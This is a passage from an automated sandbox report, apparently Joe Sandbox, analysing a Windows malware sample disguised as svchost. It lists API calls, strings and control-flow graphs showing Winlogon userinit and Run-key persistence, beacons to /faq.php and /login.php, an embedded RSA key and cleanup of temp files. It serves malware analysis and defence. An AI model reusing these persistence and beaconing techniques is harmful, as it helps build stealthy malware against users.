                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8388C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83899
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8389C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838AA
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C838AD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838BA
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C838BD
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000001), ref: 02C838D3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C838E4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 02C8375C
                                                                                                                                                                                                            • HTTP/1.0, xrefs: 02C83729
                                                                                                                                                                                                            • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C8377D
                                                                                                                                                                                                            • Referer: http://www.google.com, xrefs: 02C8376B
                                                                                                                                                                                                            • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C836DC
                                                                                                                                                                                                            • 3abfb9076ff185e9, xrefs: 02C83778
                                                                                                                                                                                                            • POST, xrefs: 02C8371C, 02C8372F
                                                                                                                                                                                                            • GET, xrefs: 02C83712
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Http$ProcessRequest$FileHeadersInternet$FreeHandleOpenValidatememset$AllocCloseConnectCreateInfoInformationQueryReadSendWrite_snprintf
                                                                                                                                                                                                            • String ID: 3abfb9076ff185e9$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                            • API String ID: 1431876097-2068853992
                                                                                                                                                                                                            • Opcode ID: 69b162da5366fc839cd22c819ebd10d18e574b30571f986c4605c700850c8126
                                                                                                                                                                                                            • Instruction ID: 5504d569ebac3d570b88e2c87a30457f6a10eee0940acfc8c6b47d78dcfd1f48
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69b162da5366fc839cd22c819ebd10d18e574b30571f986c4605c700850c8126
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACA1EB71A402987BEB11AF64DC89FEF776CEF88B19F0046A9F905E7180D7709A14CB61
                                                                                                                                                                                                            Function 02C868B0 Relevance: 51.0, APIs: 24, Strings: 5, Instructions: 244registrymemorysynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1018 2c868b0-2c868c2 1019 2c868c5-2c868ca 1018->1019 1019->1019 1020 2c868cc-2c868d3 1019->1020 1021 2c868d9-2c868e6 PathFileExistsA 1020->1021 1022 2c86ab7-2c86abf IsUserAnAdmin 1020->1022 1021->1022 1025 2c868ec-2c8690b RegOpenKeyExA 1021->1025 1023 2c86ad8-2c86ae8 1022->1023 1024 2c86ac1-2c86ad6 1022->1024 1026 2c86aed-2c86af5 RegOpenKeyExA 1023->1026 1024->1026 1027 2c86a58-2c86a71 RegOpenKeyExA 1025->1027 1028 2c86911-2c86935 RegQueryValueExA 1025->1028 1029 2c86b4b-2c86b51 1026->1029 1030 2c86af7-2c86b06 CreateEventA 1026->1030 1027->1022 1033 2c86a73-2c86a7b 1027->1033 1031 2c86a48-2c86a56 RegFlushKey 1028->1031 1032 2c8693b-2c86955 GetProcessHeap HeapAlloc 1028->1032 1030->1029 1034 2c86b08-2c86b1b RegNotifyChangeKeyValue 1030->1034 1036 2c86ab1 RegCloseKey 1031->1036 1032->1031 1035 2c8695b-2c86989 memset RegQueryValueExA StrStrIA 1032->1035 1037 2c86a80-2c86a85 1033->1037 1039 2c86b21-2c86b28 WaitForSingleObject 1034->1039 1040 2c8698f-2c86991 1035->1040 1041 2c86a26-2c86a3a GetProcessHeap HeapValidate 1035->1041 1036->1022 1037->1037 1038 2c86a87-2c86ab0 RegSetValueExA RegFlushKey 1037->1038 1038->1036 1039->1039 1042 2c86b2a-2c86b30 1039->1042 1043 2c86994-2c86999 1040->1043 1041->1031 1044 2c86a3c-2c86a42 GetProcessHeap HeapFree 1041->1044 1045 2c86b3c-2c86b49 RegNotifyChangeKeyValue 1042->1045 1046 2c86b32-2c86b37 call 2c92f90 1042->1046 1043->1043 1047 2c8699b-2c8699d 1043->1047 1044->1031 1045->1039 1046->1045 1049 2c8699f-2c869a4 1047->1049 1050 2c869c1-2c869c6 1047->1050 1049->1050 1052 2c869a6-2c869a9 1049->1052 1051 2c869c8-2c869cd 1050->1051 1051->1051 1053 2c869cf-2c869d1 1051->1053 1054 2c869b0-2c869b6 1052->1054 1056 2c869d4-2c869da 1053->1056 1054->1054 1055 2c869b8-2c869be 1054->1055 1055->1050 1056->1056 1057 2c869dc-2c869ed 1056->1057 1058 2c869f0-2c869f6 1057->1058 1058->1058 1059 2c869f8-2c86a04 1058->1059 1060 2c86a07-2c86a0c 1059->1060 1060->1060 1061 2c86a0e-2c86a20 RegSetValueExA 1060->1061 1061->1041
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02C868DE
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02C86907
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02C86927
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02C86944
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C8694B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8695F
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02C86979
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02C86981
                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02C86A20
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C86A2F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C86A32
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C86A3F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C86A42
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02C86A4C
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02C86A6D
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02C86A9D
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02C86AA7
                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 02C86AB1
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C86AB7
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02C86AED
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C86AFC
                                                                                                                                                                                                            • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02C86B19
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C86B24
                                                                                                                                                                                                            • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02C86B47
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                            • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 2213373080-1283825033
                                                                                                                                                                                                            • Opcode ID: bf019f43bef0af59052552b5b09ef3271221621f387e42b16880c8e3a12a44c3
                                                                                                                                                                                                            • Instruction ID: 8822c7c67e2016f5214d1eb9464f0d1547cdcdbd9c47378666bae36805e27dd0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf019f43bef0af59052552b5b09ef3271221621f387e42b16880c8e3a12a44c3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C071D971E84245BBEB119B649C49FBBB76CDF84708F208694F941BB280DBB1DA05C7A0
                                                                                                                                                                                                            Function 02C75C80 Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 248memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1062 2c75c80-2c75cbe memset call 2c839c0 1065 2c75cc4-2c75cd8 call 2c76570 1062->1065 1066 2c75f19-2c75f22 PathFileExistsA 1062->1066 1072 2c75cde-2c75cf3 calloc * 2 1065->1072 1073 2c75f18 1065->1073 1068 2c75f24-2c75f26 1066->1068 1069 2c75f38-2c75f3f 1066->1069 1068->1069 1071 2c75f28-2c75f32 SetFileAttributesA DeleteFileA 1068->1071 1071->1069 1074 2c75cf5-2c75cf6 exit 1072->1074 1075 2c75cfc-2c75d06 calloc 1072->1075 1073->1066 1074->1075 1076 2c75d0f-2c75d30 calloc 1075->1076 1077 2c75d08-2c75d09 exit 1075->1077 1078 2c75d32-2c75d33 exit 1076->1078 1079 2c75d39-2c75d43 calloc 1076->1079 1077->1076 1078->1079 1080 2c75d45-2c75d46 exit 1079->1080 1081 2c75d4c-2c75d6d calloc 1079->1081 1080->1081 1082 2c75d77-2c75d82 calloc 1081->1082 1083 2c75d6f-2c75d71 exit 1081->1083 1084 2c75d84-2c75d86 exit 1082->1084 1085 2c75d8c-2c75db2 calloc 1082->1085 1083->1082 1084->1085 1086 2c75db4-2c75db6 exit 1085->1086 1087 2c75dbc-2c75dcb calloc 1085->1087 1086->1087 1088 2c75dd5-2c75e18 call 2c719a0 * 3 call 2c71a10 1087->1088 1089 2c75dcd-2c75dcf exit 1087->1089 1097 2c75e1d-2c75e26 1088->1097 1089->1088 1098 2c75e28-2c75e30 1097->1098 1098->1098 1099 2c75e32-2c75e4b _strrev 1098->1099 1100 2c75e50-2c75e55 1099->1100 1100->1100 1101 2c75e57-2c75e66 1100->1101 1102 2c75e7c-2c75e7e 1101->1102 1103 2c75e68-2c75e6c 1101->1103 1104 2c75e80-2c75e88 1102->1104 1106 2c75ec3 1102->1106 1103->1104 1105 2c75e6e-2c75e7a 1103->1105 1107 2c75ebb-2c75ec1 1104->1107 1108 2c75e8a-2c75e8d 1104->1108 1105->1102 1105->1103 1109 2c75ec5-2c75f07 call 2c71850 * 4 GetProcessHeap HeapValidate 1106->1109 1107->1109 1108->1106 1110 2c75e8f-2c75e99 1108->1110 1123 2c75f15 1109->1123 1124 2c75f09-2c75f0f GetProcessHeap HeapFree 1109->1124 1110->1107 1113 2c75e9b-2c75e9e 1110->1113 1113->1106 1115 2c75ea0-2c75eaa 1113->1115 1115->1107 1117 2c75eac-2c75eaf 1115->1117 1117->1106 1119 2c75eb1-2c75eb9 1117->1119 1119->1107 1123->1073 1124->1123
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C75CA0
                                                                                                                                                                                                              • Part of subcall function 02C839C0: memset.MSVCRT ref: 02C839F2
                                                                                                                                                                                                              • Part of subcall function 02C839C0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                              • Part of subcall function 02C839C0: InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                              • Part of subcall function 02C839C0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75CE7
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75CF6
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75CFF
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75D09
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75D27
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75D33
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75D3C
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75D46
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75D64
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75D71
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75D7B
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75D86
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75DA9
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75DB6
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75DC0
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75DCF
                                                                                                                                                                                                            • _strrev.MSVCRT ref: 02C75E39
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C76406,?), ref: 02C75EFC
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C75EFF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C75F0C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C75F0F
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(02C76406,02C76406,/login.php,02C76406,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02C75F1A
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(02C76406,00000000,?,00000000,00000000), ref: 02C75F2B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(02C76406,?,00000000,00000000), ref: 02C75F32
                                                                                                                                                                                                              • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                              • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                              • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                              • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                              • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                              • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • 10001, xrefs: 02C75DFA
                                                                                                                                                                                                            • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02C75DDD
                                                                                                                                                                                                            • /login.php, xrefs: 02C75CB1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$callocexit$File$Process$memset$FreeHandleInternetOpenValidate$AllocateAttributesCloseConnectCreateDeleteExistsHttpInformationPathReadRequestSizeWrite_strrev
                                                                                                                                                                                                            • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
                                                                                                                                                                                                            • API String ID: 550513112-2761129557
                                                                                                                                                                                                            • Opcode ID: 2a7eddcdeb8045a698a5e8522566253d47138d8247603723de7eecf209b64428
                                                                                                                                                                                                            • Instruction ID: 0232dead3d0be3a74cf210bb2837edbe1b3ac61b181474ee5f9503a028576102
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a7eddcdeb8045a698a5e8522566253d47138d8247603723de7eecf209b64428
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76813870E402A5AFEB229F648C84BAFBFB8EF41344F044559ED45A7281D7B5DA04CBE1
                                                                                                                                                                                                            Function 02C85590 Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 242memorysleepfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1125 2c85590-2c855c3 memset call 2c732f0 1128 2c855c6-2c855cb 1125->1128 1128->1128 1129 2c855cd-2c855d7 1128->1129 1130 2c855dd-2c855f9 GetProcessHeap HeapAlloc 1129->1130 1131 2c8587f-2c85882 1129->1131 1132 2c8587e 1130->1132 1133 2c855ff-2c85612 memset GetTimeZoneInformation 1130->1133 1132->1131 1134 2c85618-2c8561f call 2c83d90 1133->1134 1137 2c85621-2c85633 Sleep call 2c83d90 1134->1137 1138 2c85635-2c85643 1134->1138 1137->1138 1140 2c8564c-2c8565b IsUserAnAdmin 1138->1140 1141 2c85645 1138->1141 1143 2c8565d 1140->1143 1144 2c85664-2c8571a GetTickCount call 2c93d20 _snprintf GetTempPathA GetTempFileNameA SetFileAttributesA DeleteFileA 1140->1144 1141->1140 1143->1144 1147 2c85720-2c85725 1144->1147 1147->1147 1148 2c85727-2c8573b call 2c76240 1147->1148 1151 2c8579a-2c857b9 call 2c839c0 1148->1151 1152 2c8573d-2c8573f 1148->1152 1158 2c857bb-2c857ce call 2c76570 1151->1158 1159 2c85815-2c8581c call 2c83d90 1151->1159 1154 2c85741-2c85743 1152->1154 1155 2c85792-2c85794 1152->1155 1157 2c85745-2c85749 1154->1157 1155->1151 1160 2c8574b-2c8574d 1157->1160 1161 2c85765-2c85767 1157->1161 1171 2c857d0-2c857e9 call 2c84950 GetProcessHeap HeapValidate 1158->1171 1172 2c857f7-2c85813 SetFileAttributesA DeleteFileA 1158->1172 1173 2c8581e call 2c763b0 1159->1173 1174 2c85823-2c85837 call 2c848b0 call 2c73430 1159->1174 1163 2c8574f-2c85755 1160->1163 1164 2c85761-2c85763 1160->1164 1166 2c8576a-2c8576c 1161->1166 1163->1161 1168 2c85757-2c8575f 1163->1168 1164->1166 1166->1151 1170 2c8576e-2c85780 GetProcessHeap HeapValidate 1166->1170 1168->1157 1168->1164 1170->1155 1175 2c85782-2c8578c GetProcessHeap HeapFree 1170->1175 1171->1172 1182 2c857eb-2c857f1 GetProcessHeap HeapFree 1171->1182 1172->1174 1173->1174 1184 2c85839-2c8584c 1174->1184 1185 2c85872-2c85879 Sleep 1174->1185 1175->1155 1182->1172 1186 2c85850-2c85857 Sleep call 2c73430 1184->1186 1185->1134 1188 2c8585c-2c8585e 1186->1188 1188->1134 1189 2c85864-2c8586b 1188->1189 1189->1186 1190 2c8586d 1189->1190 1190->1134
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C855B1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 02C855E7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C855EE
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C85603
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 02C85612
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 02C85626
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8564C
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C8568A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C856C6
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 02C856DB
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C856F3
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C85702
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8570F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85771
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C85778
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85785
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8578C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,02CB7A90,00000001,00000000), ref: 02C857DE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C857E1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C857EE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C857F1
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,02CB7A90,00000001,00000000), ref: 02C85800
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8580D
                                                                                                                                                                                                            • Sleep.KERNEL32(?,00000000,/faq.php,?,00000001,?,02CB7A8C,00000001,00000000), ref: 02C85851
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                              • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,00000000,/faq.php,?,00000001,?,02CB7A8C,00000001,00000000), ref: 02C85873
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d, xrefs: 02C856BF
                                                                                                                                                                                                            • /faq.php, xrefs: 02C857AC
                                                                                                                                                                                                            • %2b, xrefs: 02C8563C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileProcess$memset$Sleep$AdminAttributesCheckConnectionDeleteFreeInternetTempUserValidatelstrcpyn$AliveAllocCacheCountFlushInformationNameNetworkPathResolverTickTimeZone_snprintf
                                                                                                                                                                                                            • String ID: %2b$/faq.php$id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
                                                                                                                                                                                                            • API String ID: 3187169398-2843672900
                                                                                                                                                                                                            • Opcode ID: be2803115a0e9cbeb4c2860de464123b1cd91aff08b2676f9e31f8151721c4ef
                                                                                                                                                                                                            • Instruction ID: 8833a8bceabfceadb4c51c836d4e23b1a1e0e2c7b996f887b9cde1ca41dd3caf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: be2803115a0e9cbeb4c2860de464123b1cd91aff08b2676f9e31f8151721c4ef
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8812A72E80255ABDB25AB749C48FEA7B69EF84344F45C6D0E905D72C0EB70DA04CBA1
                                                                                                                                                                                                            Function 02C83A35 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 174memorynetworkfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
